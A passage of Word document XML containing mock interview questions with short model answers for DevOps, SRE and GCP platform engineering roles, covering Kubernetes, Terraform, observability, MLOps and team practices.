        <w:t>Q7. Model monitoring: How would you monitor model serving for latency, error rate, drift, data quality, and business impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor serving infrastructure metrics (latency, error rate, throughput) the same way you would any production service, and layer in ML-specific monitoring - input data quality checks (schema validation, missing/out-of-range values), prediction distribution drift against the training baseline, and where possible, business outcome metrics tied to model decisions (conversion, revenue impact) since a model can be technically healthy while quietly hurting the business. Alert on each category with different urgency and routing, since a latency spike and a slow drift trend require very different responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Kubernetes certificate issue: A cluster has certificate or webhook TLS failures. How would you debug certificate chain, rotation, admission webhooks, and API server errors?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the API server logs for the specific TLS error first (expired certificate, untrusted CA, hostname mismatch all produce different messages), and verify certificate expiry dates for the API server, kubelet, and any admission webhook certificates, since GKE typically rotates these automatically but a self-managed or third-party webhook certificate can expire silently. If an admission webhook is failing TLS verification, check its certificate is signed by a CA the API server trusts and that the webhook's CA bundle configuration in the cluster is current.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 10 - Senior Behavioral and Ownership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Backstage plugin: What Backstage plugins or templates would you prioritize for a GCP platform team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prioritize a software template plugin for scaffolding new services with pre-wired CI/CD and Terraform, a TechDocs plugin so documentation lives alongside code and stays discoverable, a catalog/ownership plugin so every service has clear ownership metadata, and a Kubernetes plugin surfacing live deployment status directly in Backstage. Add a cost visibility plugin once basic adoption is established, since cost transparency tends to be a high-value but secondary priority after the core golden-path experience is working well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. BigQuery cost and performance: A BigQuery workload became slow and expensive. How would you investigate query patterns, partitioning, clustering, slots, storage, and ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the INFORMATION_SCHEMA.JOBS view to identify the most expensive and slowest queries by bytes processed, and check whether tables are partitioned and clustered appropriately for the query patterns actually being run - a full table scan on an unpartitioned table is a common and expensive mistake. Check slot utilization and contention if using flat-rate/reservation pricing, review storage costs for tables that could benefit from lifecycle policies, and identify query ownership so the team writing expensive queries can be engaged directly on optimization rather than the platform team guessing at intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. SRE toil: Give examples of toil in DevOps/SRE work and explain how you would measure and reduce it with automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common toil includes manually provisioning infrastructure per request, repetitive incident triage steps that follow the same pattern every time, manual certificate/secret rotation, and hand-running the same diagnostic commands during every on-call shift. Measure toil by tracking time spent on these recurring categories (via ticket tags or time logs), prioritize automation by frequency times time-saved, and treat toil reduction as a real backlog item competing for engineering time against feature work, justified with expected ROI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Load balancing: Design a global external HTTPS load balancing strategy for multiple services. How would you handle SSL, backend health checks, Cloud Armor, CDN, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a single global external HTTPS load balancer with URL maps routing to different backend services per path/host, Google-managed SSL certificates for automatic renewal, and health checks tuned to each backend's actual readiness signal rather than a generic TCP check. Attach Cloud Armor for WAF/rate limiting at the edge, enable Cloud CDN for cacheable content to reduce backend load and latency, and monitor per-backend latency, error rate, and Cloud Armor block counts so issues can be isolated to a specific service quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Jenkins modernization: A company has old Jenkins pipelines. How would you modernize without disrupting releases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Modernize incrementally rather than a big-bang rewrite - start by converting Jenkinsfiles to declarative pipeline syntax and moving shared logic into versioned shared libraries, then migrate agents to containerized, ephemeral build environments instead of long-lived static agents that accumulate drift. Run the modernized pipeline in parallel with the old one for critical services until confidence is established, and prioritize migrating the highest-maintenance-burden pipelines first so the effort pays off quickly and builds momentum for the rest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Dashboard design: What dashboards would you build for executives, SREs, platform engineers, and application teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Executives need a small number of high-level, business-outcome-oriented metrics (overall availability, major incident count, cost trend) without technical detail. SREs need SLO burn rate, error budget status, and incident/alert trends across services. Platform engineers need infrastructure health and capacity trends across the whole fleet. Application teams need service-specific golden signals (latency, traffic, errors, saturation) scoped to just their own services - each audience needs a different altitude of information, not the same dashboard with more or less zoom.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Prioritization: You have security backlog, cost pressure, and reliability incidents. How would you prioritize work for the next quarter?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prioritize based on actual risk and business impact rather than whichever is loudest: address any security findings with active exploitability or regulatory deadline first, then reliability work if incident frequency is trending up and threatening customer trust, with cost optimization worked in continuously as lower-risk, high-ROI items are identified rather than treated as a separate large initiative. Make the tradeoff explicit and visible to stakeholders (a prioritized backlog with reasoning) so the decision is defensible and revisitable as circumstances change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Runbooks: How would you build a runbook library for common GKE, Terraform, IAM, and networking incidents, and how would you keep it updated?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start runbooks from actual past incidents rather than hypothetical scenarios, capturing the exact diagnostic steps and commands that resolved them, and structure each one with a consistent format (symptom, diagnosis steps, resolution, escalation path) so on-call engineers can navigate them quickly under pressure. Keep them updated by making runbook review a required part of every postmortem - if a runbook was wrong or missing during an incident, updating it is an explicit action item, not an afterthought.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 11 - Google-Style Mixed Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. PDB design: How would you use PodDisruptionBudgets during node upgrades, cluster autoscaling, and planned maintenance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set a PodDisruptionBudget for every workload specifying the minimum number of replicas that must remain available during voluntary disruptions, so node upgrades, cluster autoscaler scale-downs, and planned maintenance all respect that minimum rather than potentially draining too many replicas of the same service simultaneously. Size the PDB based on the service's actual availability requirement (e.g. minAvailable of 50% or more for critical services), and test that upgrades genuinely respect it by watching pod counts during a real maintenance window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Stateful Kubernetes workloads: When would you avoid running stateful workloads on GKE, and if you must run them, how would you design storage, backup, upgrades, and recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Avoid running genuinely critical, high-throughput stateful systems (primary production databases) on Kubernetes when a managed service (Cloud SQL, AlloyDB) meets the need with far less operational burden. If you must run stateful workloads on GKE (caches, message brokers, smaller databases), use StatefulSets with PersistentVolumeClaims backed by regional persistent disks for durability, implement application-aware backup (not just disk snapshots) with tested restore procedures, and plan node/cluster upgrades carefully since stateful pods can't simply be rescheduled anywhere without storage locality considerations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. On-call maturity: How would you improve an on-call rotation that has too many alerts, poor runbooks, and slow escalation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by cutting alert volume aggressively based on which alerts actually led to action historically, rebuild remaining alerts around SLO burn rate with clear ownership, and write runbooks from real past incidents rather than generic templates. Fix slow escalation by defining clear escalation timeouts and paths (who gets paged next if the primary doesn't acknowledge within N minutes) and rehearsing the escalation path so it's not being discovered for the first time during a real incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. GPU cost control: GPU workloads are underutilized and expensive. How would you improve scheduling, quotas, sharing, and monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor actual GPU utilization (not just allocation) to find workloads reserving GPUs they don't fully use, and consider GPU sharing/time-slicing or MIG (Multi-Instance GPU) partitioning so multiple smaller workloads can share a single physical GPU instead of each requiring a dedicated one. Set per-team GPU quotas to prevent overprovisioning, use spot/preemptible GPU nodes for fault-tolerant workloads to cut cost significantly, and build utilization dashboards visible to teams so cost accountability drives more efficient usage over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. RBAC: How would you design Kubernetes RBAC for platform, application, security, and CI/CD teams in a shared GKE environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scope RBAC by both namespace and role: platform team gets cluster-admin-level access for cluster-wide resources, application teams get namespace-scoped edit access limited to their own namespaces, security teams get read-only cluster-wide access plus write access to security-relevant resources (NetworkPolicies, PodSecurityPolicies) for review purposes, and CI/CD service accounts get narrowly scoped, namespace-limited deploy permissions rather than broad access. Use groups (via GCP IAM or an external identity provider) rather than individual bindings so access changes with team membership automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Inference optimization: How would you improve model latency and throughput using batching, autoscaling, model format optimization, GPU use, or caching?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Batch multiple inference requests together where latency tolerance allows, since GPUs achieve much better throughput per request when processing batches rather than one at a time, and use a serving framework (vLLM, TensorFlow Serving, Triton) that implements this automatically. Optimize the model format (quantization, ONNX/TensorRT conversion) to reduce compute per inference, autoscale based on queue depth or GPU utilization rather than just CPU, and cache responses for repeated or common queries where the use case tolerates it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Blue-green deployment: When would you choose blue-green over canary, and what GCP/GKE components would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose blue-green when you need an instant, all-or-nothing cutover with the simplest possible rollback (just switch traffic back), which suits changes where partial-traffic canary testing isn't practical or where the risk profile favors full validation on a complete parallel environment before any real traffic hits it. Implement it on GKE with two full deployments (blue and green) behind a Service or load balancer, switching the selector/backend to cut traffic over, or use Cloud Deploy's built-in blue-green rollout strategy for a managed version of the same pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. SDK automation: Compare using Terraform, gcloud, REST APIs, and Python SDKs for platform automation. When would you choose each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform is the right default for declarative, idempotent infrastructure provisioning that needs state tracking and drift detection. gcloud CLI is best for quick one-off operational tasks and scripting simple sequences. REST APIs give the most control and are the right choice when building a custom platform/automation layer that needs fine-grained handling of responses and errors. Python SDKs sit between gcloud and raw REST - use them when building more substantial automation tools that need programmatic logic (conditionals, loops, integration with other systems) beyond what a shell script comfortably handles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 12 - Product Company Final Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Cloud Run incident: A Cloud Run service has cold-start latency and failed requests after a traffic spike. How would you debug concurrency, min instances, CPU allocation, revisions, and downstream limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether min instances is set to 0 (causing cold starts on every scale-up from idle) and consider setting a small minimum for latency-sensitive services, and verify the concurrency setting matches what the application can actually handle per instance without resource contention. Check if CPU allocation is set to 'CPU only during requests' versus always-allocated, which affects background work and startup behavior, and verify downstream dependencies (databases, APIs) have enough capacity to handle the scaled-up Cloud Run instance count without becoming the new bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. GKE scheduling: A deployment is pending because pods cannot be scheduled. How would you debug requests, limits, node capacity, taints, affinities, quotas, and cluster autoscaler?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run `kubectl describe pod` to see the exact scheduling failure reason (insufficient CPU/memory, no nodes matching affinity/taint requirements, quota exceeded), which usually tells you precisely what's blocking scheduling rather than requiring guesswork. Check whether resource requests are unreasonably high for available node capacity, verify taints/tolerations and affinity rules aren't overly restrictive, confirm namespace ResourceQuotas aren't exhausted, and check whether cluster autoscaler is actually configured to add capacity (correct node pool max size) in response to pending pods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Terraform provider upgrades: How would you safely upgrade Terraform and Google provider versions across many workspaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Upgrade in a low-risk workspace first and run a full plan to check for any unexpected diffs the new provider version introduces (providers occasionally change default behavior or resource schemas), reading the provider changelog for breaking changes before upgrading broadly. Roll the upgrade out incrementally across workspaces rather than all at once, pin the new version explicitly once validated, and keep a rollback plan (pin back to the previous version) ready in case a workspace shows unexpected plan diffs after upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. CoreDNS incident: Services in a cluster intermittently fail DNS resolution. How would you debug CoreDNS, kube-dns metrics, network policies, and upstream DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check CoreDNS pod health and resource usage first, since CPU throttling or OOM under load is a common cause of intermittent DNS failures, and review CoreDNS metrics for query latency and error rate spikes correlated with the failure pattern. Verify no NetworkPolicy is inadvertently blocking traffic to CoreDNS pods, and check whether upstream DNS (for external domain resolution) is slow or failing, since CoreDNS forwards non-cluster queries upstream and a slow upstream resolver can manifest as intermittent cluster-wide DNS issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Bash vs Python: When is Bash acceptable for automation, and when should you rewrite it in Python or Go?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bash is fine for short, linear glue scripts - a few dozen lines chaining existing CLI tools together with minimal logic. Once a script needs real data structures, error handling beyond exit codes, unit testing, or grows past roughly 50-100 lines with conditional branches, it should be rewritten in Python (or Go for a distributed CLI) where the language provides better abstractions, testability, and maintainability than Bash's string-based, loosely-typed model can offer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Responsible AI: What checks would you add for bias, explainability, lineage, and responsible AI before approving a model for production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
